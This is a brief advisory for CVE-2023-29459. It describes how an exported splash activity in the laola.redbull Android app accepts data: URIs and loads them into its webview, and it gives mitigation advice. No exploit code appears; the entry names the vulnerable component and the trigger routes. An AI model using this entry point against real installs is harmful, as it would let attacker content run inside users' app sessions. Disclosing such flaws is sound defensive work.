CVE-2023-29459

Name of the Vulnerable Software and Affected Versions laola.redbull application through 5.1.9-R for Android

Description The laola.redbull application exposes the exported activity at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity, which accepts a data: URI. The target of this URI is subsequently loaded into the application's webview, thus allowing the loading of arbitrary content into the context of the application. This can occur via the fcrbs schema or an explicit intent invocation.

Recommendations For versions through 5.1.9-R, consider disabling the at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity activity until a patch is available. Restrict access to the webview component to minimize the risk of exploitation. Avoid using the data: URI scheme in the affected application until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.